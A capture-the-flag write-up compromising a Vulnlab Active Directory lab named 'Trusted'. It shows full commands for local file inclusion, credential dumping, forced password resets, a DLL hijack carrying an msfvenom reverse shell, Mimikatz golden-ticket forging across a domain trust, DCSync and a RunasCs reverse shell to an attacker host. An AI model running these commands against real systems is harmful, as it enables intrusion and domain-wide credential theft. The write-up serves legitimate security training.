VL-Trusted

,

Initial Reconnaissance

Our initial port scan revealed several open ports and services on the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.53 
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 19:39:41Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows 
443/tcp   open  ssl/http      syn-ack ttl 127 Apache httpd 2.4.53 
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3306/tcp  open  mysql         syn-ack ttl 127 MariaDB 5.5.5-10.4.24
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolNew, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: V7M]l*(*:'O="/g<2%a:
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-12T19:40:41+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI 
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57941/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58459/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Web Enumeration

The target is running a web server on port 80. I used feroxbuster to discover hidden directories:

1
feroxbuster -u http://10.10.213.214/

This revealed a /dev directory:

1
301      GET        9l       30w      336c http://10.10.213.214/dev => http://10.10.213.214/dev/

Xamoo Homepage
Manes Winchester Page

Exploiting Local File Inclusion (LFI)

Testing for LFI vulnerability:

1
http://10.10.213.214/dev/index.html?view=../

Unsecure File Query
Confirming the LFI vulnerability by accessing Windows system files:

1
http://10.10.213.214/dev/index.html?view=../../../../../../windows/win.ini

LFI Vulnerability Confirmed
Using ffuf to enumerate potential files via LFI:

1
ffuf -u "http://10.10.213.214/dev/index.html?view=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -e .php,.txt,.log,.ini -fl 35,33,40

DB File Found
To extract the contents of the PHP file, I used a base64 filter:

1
http://10.10.213.214/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php

MongoDB Password

Database Enumeration

After decoding the base64 output, I obtained MySQL credentials:
root : SuperSecureMySQLPassw0rd1337.
Connecting to the MySQL server:

1
mysql -h 10.10.213.214 -u root -p --skip-ssl

Enumerated the databases and tables:

1
2
3
4
SHOW DATABASES;
USE news;
SHOW TABLES;
SELECT * FROM users;

Retrieved user credentials:

1
2
3
4
5
6
7
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+

After cracking the hashes:

1
rsmith : IHateEric2

SMB Enumeration

Checked for accessible SMB shares with the credentials:

1
netexec smb 10.10.213.214 -u rsmith -p <PASS> --shares

RSmith Shares
Other user accounts identified:

1
2
ewalters  
cpowers

No valuable content was found on the accessible shares.

Active Directory Enumeration with BloodHound

Used BloodHound to map the domain:

1
netexec ldap 10.10.213.214 -u rsmith -p IHateEric2 --bloodhound --dns-server 10.10.213.214 -c ALL --dns-tcp

BloodHound revealed a bidirectional domain trust between trusted.vl and lab.trusted.vl:
Cross Domain Trust
Also discovered that rsmith has ForceChangePassword rights over ewalters:
Attack Path

Lateral Movement

Exploiting the ForceChangePassword right to gain access as ewalters:

1
bloodyAD --host "labdc.lab.trusted.vl" -d "lab.trusted.vl" -u "rsmith" -p "<PASS>" set password "ewalters" "HelloWorld123@"

Connecting with the new credentials:

1
evil-winrm -i labdc.lab.trusted.vl -u ewalters -p HelloWorld123@

In the C:\AVTest directory, found an interesting readme:

1
2
3
4
5
type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

DLL Hijacking

Transferred the KasperskyRemovalTool.exe to analyze:
On Linux:

1
impacket-smbserver smb /mnt -smb2support

On Windows:

1
copy .\KasperskyRemovalTool.exe \\10.8.5.195\smb\KasperskyRemovalTool.exe

Analyzed the executable with Process Monitor to identify DLL injection opportunities:

Set up filters for:

  1. Process Name
  2. Path containing .dll
  3. Result containing “NAME NOT FOUND”

Filter Name
DLL Filter
Final Filter
Process Monitor revealed that the executable attempts to load a DLL named KasperskyRemovalToolENU.dll from the current directory:
DLL Injection Opportunity
Created a malicious DLL with the same name containing a reverse shell:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f dll > KasperskyRemovalToolENU.dll

Set up SMB server to transfer the file:

1
impacket-smbserver smb /mnt -smb2support

Copied the malicious DLL to the target:

1
copy \\10.8.5.195\smb\KasperskyRemovalToolENU.dll .\KasperskyRemovalToolENU.dll

After executing the Kaspersky tool, received a reverse shell:
Got Shell

Privilege Escalation via Domain Trust Abuse

Uploaded Mimikatz to map domain trust and forge a golden ticket:

1
privilege::debug
1
lsadump::trust /patch

Domain Trust
Extracted the krbtgt hash:

1
lsadump::dcsync /domain:lab.trusted.vl /all

KRBTGT Hash

Gathered the following information:

  1. LAB.TRUSTED.VL SID: S-1-5-21-2241985869-2159962460-1278545866
  2. TRUSTED.VL SID: S-1-5-21-3576695518-347000760-3731839591 + 519
  3. krbtgt hash: c7a03c565c68c6fac5f8913fab576ebd

Created a golden ticket to exploit the trust relationship:

1
Kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:c7a03c565c68c6fac5f8913fab576ebd /service:krbtgt /target:trusted.vl /ticket:trustkey.kirbi ptt

Performed a DCSync attack to extract all domain credentials:

1
lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Trusted Admin

Final Privilege Escalation

Since we couldn’t directly access the root.txt file without administrator context, we changed the Administrator password and used RunasCs to get a shell with administrative privileges:

1
net user Administrator HelloWorld123@
1
./RunasCs.exe Administrator 'HelloWorld123@' cmd.exe -r '10.8.5.195:443'

This provided us with full administrative access to the domain, completing the penetration test.
Vulnlab Cert